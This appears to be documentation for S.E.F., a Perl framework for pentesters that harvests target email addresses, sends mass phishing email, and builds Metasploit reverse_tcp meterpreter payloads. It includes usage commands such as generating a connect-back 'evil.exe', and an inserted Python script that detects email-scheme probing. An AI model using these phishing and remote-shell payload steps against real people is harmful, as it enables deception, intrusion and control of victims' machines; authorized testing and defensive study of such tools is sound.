S.E.F. - Social Engineering Framework

S.E.F. is a framework that makes social engineering easier for pentesters. It provides several tools that automate many of the mundane tasks that social engineering requires. It includes the following tools:

  • sefemails - generate a list of email addresses based on a list of names and email scheme
  • sefphish - send out a large number of phishing emails
  • sefnames - generate a list of names based on email addresses
  • sefpayload - generate a Metasploit meterpreter payload

The first step in social engineering is to gather a list of email addresses for your targets. Sefemails can be used to generate email addresses based on email schemes. This is a far more effective method than scraping Google.

Once you have a list of victims, it is important to have a repeatable process that is flexible for performing phishing attacks. Sefphish uses a configuration file so that the phishing attack can be customized for each target.

Sefpayload and sefnames provide some additional functionality that may be helpful depending on your needs. Sefpayload is a tool to generate Metasploit reverse_tcp meterpreter payloads for use during social engineering. Sefnames is a tool to extract names from email addresses.

The documentation for Installation can be found here

sefemails

Description

Tool to generate a list of email addresses based on a list of names and email scheme.

Many people use either Google or tools like goog-mail.py or theHarvester to generate email lists when performing a penetration test. However, these tools are not the most effective method to gather email addresses. I have thought about a smarter way to gather email lists. It occurred to me that if you knew the scheme which a company uses to generate the email addresses, you could simply generate email addresses using a list of names.

    [firstname][dot][lastname]          @COMPANY.com
    [firstname][underscore][lastname]   @COMPANY.com
    [firstchar_firstname][lastname]     @COMPANY.com
    

Therefore, instead of scraping Google all day, we only need to find a list of names and generate the email address lists ourselves.

Sometimes we don't know the scheme. In that case, we can try several schemes and determine the correct one based on the error responses returned when sending an email.

Examples:

    $ perl sefemails.pl google.com -n names.txt -s 1
    bobbytables@google.com
    johnsmith@google.com
    
    $ perl sefemails.pl google.com -n names.txt -s 3
    bobby_tables@google.com
    john_smith@google.com
    

Usage:

    Options:
    -d   --domain [domain]       Domain
    -n   --names [name list]     File containing list of names
    -s   --scheme [scheme]       Scheme Number(s) (Comma Separated)
    
    -a   --all                   Generate list with all schemes

    -t   --type [number]         Generate list using a specific type
    -g   --group [number]        Generate list with for a specific grouping

    -v   --version               Display version
    -h   --help                  Display this information

    Schemes Examples:
            Scheme                  Separator
            ------                  ----------
            1                       none            (ex: johnsmith@domain)
            2                       dash            (ex: john-smith@domain)
            3                       underscore      (ex: john_smith@domain)
            4                       dot             (ex: john.smith@domain)

            11                      none            (ex: jsmith@domain)
            22                      dash            (ex: j-smith@domain)

            ...  This continues for all the types below    ...

    Schemes Definition:
            Scheme      Group
            1-10        1           firstname lastname
            11-20       2           first_char_firstname lastname
            21-30       3           five_chars_firstname lastname
            31-40       4           five_chars_firstname first_char_lastname
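
On the receiving mail server, the scheme guessing described above appears as one source trying several separator variants of the same name. As an added example (not part of S.E.F. or its documentation), this Python detection flags that pattern; the event tuples, addresses, IP addresses and the `min_variants` threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: (source IP, RCPT TO address, SMTP reply code) tuples as
# they might be parsed from an MTA log. 550 = mailbox unknown, 250 = accepted.
SAMPLE_EVENTS = [
    ("203.0.113.7", "johnsmith@example.com", 550),
    ("203.0.113.7", "john-smith@example.com", 550),
    ("203.0.113.7", "john_smith@example.com", 550),
    ("203.0.113.7", "john.smith@example.com", 250),
    ("203.0.113.7", "bobby.tables@example.com", 250),
    ("198.51.100.4", "jon.smith@example.com", 550),  # plausible typo, one attempt
    ("198.51.100.4", "sales@example.com", 250),
]

# Dash, underscore and dot: the separators listed in the scheme table above.
SEPARATORS = re.compile(r"[-_.]")


def canonical(address):
    """Collapse separator variants of one name to a single key."""
    local, _, domain = address.lower().partition("@")
    return SEPARATORS.sub("", local) + "@" + domain


def find_scheme_probing(events, min_variants=3):
    """Return {source: {canonical_key: sorted variants}} for sources that tried
    at least `min_variants` spellings of one name, at least one of them rejected."""
    seen = defaultdict(lambda: defaultdict(set))
    rejected = defaultdict(set)
    for source, rcpt, code in events:
        key = canonical(rcpt)
        seen[source][key].add(rcpt.lower())
        if 500 <= code < 600:  # permanent failure, e.g. unknown mailbox
            rejected[source].add(key)
    findings = {}
    for source, by_key in seen.items():
        hits = {k: sorted(v) for k, v in by_key.items()
                if len(v) >= min_variants and k in rejected[source]}
        if hits:
            findings[source] = hits
    return findings


if __name__ == "__main__":
    for source, hits in find_scheme_probing(SAMPLE_EVENTS).items():
        for key, variants in hits.items():
            print(f"{source} tried {len(variants)} variants of {key}: {', '.join(variants)}")
```

A single mistyped recipient does not trigger the rule; only repeated spellings of the same name from one source do.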
     

sefphish

Description

Tool for sending out a large number of phishing emails.

This tool provides the ability to send out a large number of phishing emails. It uses a YAML configuration file to make this easier. The config file is included (config.yaml). The configuration file is commented so it will be very easy to modify for your phishing attack. This script sends out email phishing attacks using a CSV file as input.

Review the configuration file (config.yaml)

Example:

    John Smith,jsmith@company.com
    Bob Davis,bdavis@company.com
    ... etc

Features

  • Send emails using your SMTP server and/or Gmail (via TLS)
  • Add attachments to phishing emails
  • Create Metasploit payloads on the fly, rename and zip them if needed
  • Email template files included (PDF, EXE and Word)
  • Option to add a signature to each phishing email
  • Option to add the target's name to the top of the phishing email
  • Supports text and HTML



sefnames

Description

This tool reverses email addresses and extracts the full name of the victim. It is useful when you have many email addresses that you need to convert to names.

Usage:

    Options:
    -d   --domain [domain]       Domain
    -i   --input [input file]    File containing list of names
    -s   --scheme [scheme]       Scheme Number(s) (Comma Separated)

    -v   --version               Display version
    -h   --help                  Display this information

    Schemes Examples:
            Scheme                  Separator
            ------                  ----------
            1                       dash            (ex: john-smith@domain)
            2                       underscore      (ex: john_smith@domain)
            3                       dot             (ex: john.smith@domain)
    

sefpayload

Description

Tool to generate a Metasploit reverse_tcp meterpreter payload. By default it assumes Metasploit is installed in /pentest/exploits/framework3.

Usage:

    Options:
    -i  --ip [ip]           IP Address of the Metasploit server
    -f  --framework [dir]   Metasploit directory (Default: /pentest/exploits/framework3)
    -p  --port [port]       Port to use for the Metasploit reverse connection (Default: 443)
    -o  --output [output]   Output filename (Default: MS.exe)

    -v  --version           Print version information
    -h  --help              Print help info
    

Examples:

Generate a Metasploit meterpreter reverse_tcp payload with a connect-back to 127.0.0.1 on port 443/tcp.

    $ ./sefpayload -i 127.0.0.1
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

Generate a Metasploit meterpreter reverse_tcp payload with a connect-back to 127.0.0.1 on port 53/tcp.

    $ ./sefpayload -i 127.0.0.1 -p 53
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

Generate a Metasploit (installed in /opt/metasploit3/msf3) meterpreter reverse_tcp payload with a connect-back to 127.0.0.1 on port 443/tcp.

    $ ./sefpayload -i 127.0.0.1 -f /opt/metasploit3/msf3/
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

Generate a Metasploit meterpreter reverse_tcp payload with a connect-back to 127.0.0.1 on port 443/tcp named evil.exe.

    $ ./sefpayload -i 127.0.0.1 -o evil.exe
    [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

Installation

Quick Install - simply run from this directory

To install S.E.F. properly, make sure you have the needed dependencies:

  • Net::SMTP
  • Net::SMTP::TLS
  • YAML
  • Net::Cmd
  • Authen::SASL
  • MIME::Lite

To install a module simply execute the following command:

    $ sudo perl -MCPAN -e 'install Net::SMTP'

Once all of the modules are installed, simply execute the following commands:

    perl Makefile.PL
    make
    # Then, as root:
    make install

Version 1.0 can be found here